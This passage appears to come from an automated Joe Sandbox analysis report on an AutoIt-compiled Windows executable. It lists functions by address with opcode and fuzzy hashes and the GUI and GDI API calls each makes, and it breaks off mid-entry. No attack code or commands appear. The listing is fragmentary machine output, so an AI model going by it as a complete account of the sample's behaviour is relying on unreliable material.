                                                                                                                        • Opcode ID: c26b292e18e9a31aba765d270f4dac030bdf9532f4e90805d650d0f913a44ca5
                                                                                                                        • Instruction ID: b4b2b6670b6a46d1a79ee37a0e1aa948a2e83be6d24b152ad9c1740506fc0e11
                                                                                                                        • Opcode Fuzzy Hash: c26b292e18e9a31aba765d270f4dac030bdf9532f4e90805d650d0f913a44ca5
                                                                                                                        • Instruction Fuzzy Hash: 1132F232A001658BDF28CE69D89467D7FA1FF46300F28856BD4EADB792D630DE81DB41
                                                                                                                        Function 00517920 Relevance: .6, Instructions: 563COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec936efcb0f7118a000e891df138f9b8d036b195de57d93b07273583f2cc40a5
                                                                                                                        • Instruction ID: 96dd3358aa9fc646125892e4841828c2d94547bf540d9603fff657cf00a5c39a
                                                                                                                        • Opcode Fuzzy Hash: ec936efcb0f7118a000e891df138f9b8d036b195de57d93b07273583f2cc40a5
                                                                                                                        • Instruction Fuzzy Hash: 5A22B270A0460ADFEF14CF68D865AEEBBB5FF48301F10452AE816A7291FB35AD54CB50
                                                                                                                        Function 005191C0 Relevance: .5, Instructions: 475COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 016094559ed73388142e33932e4bc3b66fab04dd689ab6af4c250150d50482e1
                                                                                                                        • Instruction ID: 569ac9444a55ac1755b9f3dd5d1498b080e8181ff17d1e372d27061967790070
                                                                                                                        • Opcode Fuzzy Hash: 016094559ed73388142e33932e4bc3b66fab04dd689ab6af4c250150d50482e1
                                                                                                                        • Instruction Fuzzy Hash: 5E02E8B1E00206EBDB05DF64D896AADBFB5FF44300F11856AE816DB291E731EE54CB81
                                                                                                                        Function 00531C77 Relevance: .3, Instructions: 254COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                        • Instruction ID: 776d4bfb39ffbb146dbfbe42a2817ca310806dc6a39976d7a32dd73c1ccdbdd8
                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                        • Instruction Fuzzy Hash: C99178732084A34ADB69463E857407EFFE17A923A1B1A0B9DD4F2CB1C5FE24C954E724
                                                                                                                        Function 005319B0 Relevance: .2, Instructions: 240COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                        • Instruction ID: 7b77afa1755ae17b678c8bd0505fc09574663a2bd1a061a7bc7b46bc2d8ed6bc
                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                        • Instruction Fuzzy Hash: AF9145732098E34EDB2D467A857403EFFE16A923A2B1A079DD4F2CB1C1FE14C964D624
                                                                                                                        Function 00537A4A Relevance: .2, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3209de6a0479d8c7121cce61d4ff15b729cf2cde7c9c6418e444edb62aa39ce3
                                                                                                                        • Instruction ID: 50b5a69be44266dd7199e9a4bae3124cc82c5a7c218cc410244de98d72f1e9bc
                                                                                                                        • Opcode Fuzzy Hash: 3209de6a0479d8c7121cce61d4ff15b729cf2cde7c9c6418e444edb62aa39ce3
                                                                                                                        • Instruction Fuzzy Hash: 2F612AF1E0874E66DA785A2849B5BBEAFA4FF8D700F140D19F843DB281E6119E41C355
                                                                                                                        Function 00531706 Relevance: .2, Instructions: 232COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                        • Instruction ID: 9127fcd35deeb4ff7a40335f90b528e0281608f6d0aa8d038872b92310812c53
                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                        • Instruction Fuzzy Hash: E98188336094A34DDB6D863A853453EFFE17A923A1B1E079DD4F2CB1C1EE24C554D628
                                                                                                                        Function 00592ADE Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 486filecommemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00592B30
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00592B43
                                                                                                                        • DestroyWindow.USER32 ref: 00592B52
                                                                                                                        • GetDesktopWindow.USER32 ref: 00592B6D
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00592B74
                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00592CA3
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00592CB1
                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592CF8
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00592D04
                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00592D40
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D62
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D75
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D80
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00592D89
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D98
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00592DA1
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592DA8
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00592DB3
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592DC5
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,005AFC38,00000000), ref: 00592DDB
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00592DEB
                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00592E11
                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00592E30
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592E52
                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0059303F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                        • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                                                                                        • API String ID: 2211948467-3613752883
                                                                                                                        • Opcode ID: a0d8ee3343bf5e662cf8efd1b1dad136db9ec5ae20eea3d995f91820ea175789
                                                                                                                        • Instruction ID: a658e8566bcbc5b811fbe4d2704be4992c5475ad60fac345de20c93da84dea2f
                                                                                                                        • Opcode Fuzzy Hash: a0d8ee3343bf5e662cf8efd1b1dad136db9ec5ae20eea3d995f91820ea175789
                                                                                                                        • Instruction Fuzzy Hash: 75027A71A00209AFDB14DF68CC89EAE7FB9FF49310F008558F915AB2A1DB74AD45DB60
                                                                                                                        Function 005A70D5 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 273COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 005A712F
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 005A7160
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 005A716C
                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 005A7186
                                                                                                                        • SelectObject.GDI32(?,?), ref: 005A7195
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 005A71C0
                                                                                                                        • GetSysColor.USER32(00000010), ref: 005A71C8
                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 005A71CF
                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 005A71DE
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 005A71E5
                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 005A7230
                                                                                                                        • FillRect.USER32(?,?,?), ref: 005A7262
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A7284
                                                                                                                          • Part of subcall function 005A73E8: GetSysColor.USER32(00000012), ref: 005A7421
                                                                                                                          • Part of subcall function 005A73E8: SetTextColor.GDI32(?,?), ref: 005A7425
                                                                                                                          • Part of subcall function 005A73E8: GetSysColorBrush.USER32(0000000F), ref: 005A743B
                                                                                                                          • Part of subcall function 005A73E8: GetSysColor.USER32(0000000F), ref: 005A7446
                                                                                                                          • Part of subcall function 005A73E8: GetSysColor.USER32(00000011), ref: 005A7463
                                                                                                                          • Part of subcall function 005A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 005A7471
                                                                                                                          • Part of subcall function 005A73E8: SelectObject.GDI32(?,00000000), ref: 005A7482
                                                                                                                          • Part of subcall function 005A73E8: SetBkColor.GDI32(?,00000000), ref: 005A748B
                                                                                                                          • Part of subcall function 005A73E8: SelectObject.GDI32(?,?), ref: 005A7498
                                                                                                                          • Part of subcall function 005A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 005A74B7
                                                                                                                          • Part of subcall function 005A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005A74CE
                                                                                                                          • Part of subcall function 005A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 005A74DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 4124339563-2594219639
                                                                                                                        • Opcode ID: 6c2ac13a7f8148bc3d8dcafdc1d86955a9f1c6e57ed0fa64f5bb3adab9c6f695
                                                                                                                        • Instruction ID: 9e0bcbd9bb9c35c7f9045a8e5b9d3a3e4844c77660121f3b47190b4ba9668048
                                                                                                                        • Opcode Fuzzy Hash: 6c2ac13a7f8148bc3d8dcafdc1d86955a9f1c6e57ed0fa64f5bb3adab9c6f695
                                                                                                                        • Instruction Fuzzy Hash: 96A19C72508305AFDB009F60DC48A6FBFE9FF9E320F100A19FA62961A1D730E948DB51
                                                                                                                        Function 00528D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?), ref: 00528E14
                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00566AC5
                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00566AFE
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00566F43
                                                                                                                          • Part of subcall function 00528F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00528BE8,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528FC5
                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00566F7F
                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00566F96
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00566FAC
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00566FB7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                        • String ID: 0$@U=u
                                                                                                                        • API String ID: 2760611726-975001249
                                                                                                                        • Opcode ID: c86afaa39f83b6e2f73581394125333b95f84c4efadbc434a888d0b833933765
                                                                                                                        • Instruction ID: f4de8b26466931e39962bd73c3442262321286c3043d3a9156dd4324a2c4ea55
                                                                                                                        • Opcode Fuzzy Hash: c86afaa39f83b6e2f73581394125333b95f84c4efadbc434a888d0b833933765
                                                                                                                        • Instruction Fuzzy Hash: 0C129B30601651EFDB25CF14D888BBABFE9FF5A300F144569E485CB2A2CB32AC55DB91
                                                                                                                        Function 00592711 Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 330windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0059273E
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0059286A
                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 005928A9
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 005928B9
                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00592900
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0059290C
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00592955
                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00592964
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00592974
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00592978
                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00592988
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00592991
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0059299A
                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005929C6
                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 005929DD
                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00592A1D
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00592A31
                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00592A42
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00592A77
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00592A82
                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00592A8D
                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00592A97
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                        • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                        • API String ID: 2910397461-2771358697
                                                                                                                        • Opcode ID: 2bd84887d2d0ebc291479d75db7d456c73165498930e3a0e3cd3a44019db8e54
                                                                                                                        • Instruction ID: ea1cfc400f18c441bae5644aa6780bcb876581a182681f117f3de12bcfcece12
                                                                                                                        • Opcode Fuzzy Hash: 2bd84887d2d0ebc291479d75db7d456c73165498930e3a0e3cd3a44019db8e54
                                                                                                                        • Instruction Fuzzy Hash: 30B14A71A00219BFEB14DFA8CC89EAE7BA9FB59710F008515F915EB290D770AD44CBA4
                                                                                                                        Function 005A73E8 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 201windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000012), ref: 005A7421
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 005A7425
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 005A743B
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 005A7446
                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 005A744B
                                                                                                                        • GetSysColor.USER32(00000011), ref: 005A7463
                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 005A7471
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 005A7482
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 005A748B
                                                                                                                        • SelectObject.GDI32(?,?), ref: 005A7498
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 005A74B7
                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005A74CE
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 005A74DB
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A752A
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 005A7554
                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 005A7572
                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 005A757D
                                                                                                                        • GetSysColor.USER32(00000011), ref: 005A758E
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 005A7596
                                                                                                                        • DrawTextW.USER32(?,005A70F5,000000FF,?,00000000), ref: 005A75A8
                                                                                                                        • SelectObject.GDI32(?,?), ref: 005A75BF
                                                                                                                        • DeleteObject.GDI32(?), ref: 005A75CA
                                                                                                                        • SelectObject.GDI32(?,?), ref: 005A75D0
                                                                                                                        • DeleteObject.GDI32(?), ref: 005A75D5
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 005A75DB
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 005A75E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 1996641542-2594219639
                                                                                                                        • Opcode ID: 45fe74a14a4e07a35c79856ecf4ed0ce2e3e3c2aae3c0d2febab0e85b02c4953
                                                                                                                        • Instruction ID: fd6aa1b34001fde29dca1707c8de140ed363b044908c8989d770abc0267c3d0f
                                                                                                                        • Opcode Fuzzy Hash: 45fe74a14a4e07a35c79856ecf4ed0ce2e3e3c2aae3c0d2febab0e85b02c4953
                                                                                                                        • Instruction Fuzzy Hash: 19614A72D04218AFDF019FA4DC49AAEBFB9FF0E320F114525F915AB2A1D7749940DB90
                                                                                                                        Function 00584ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
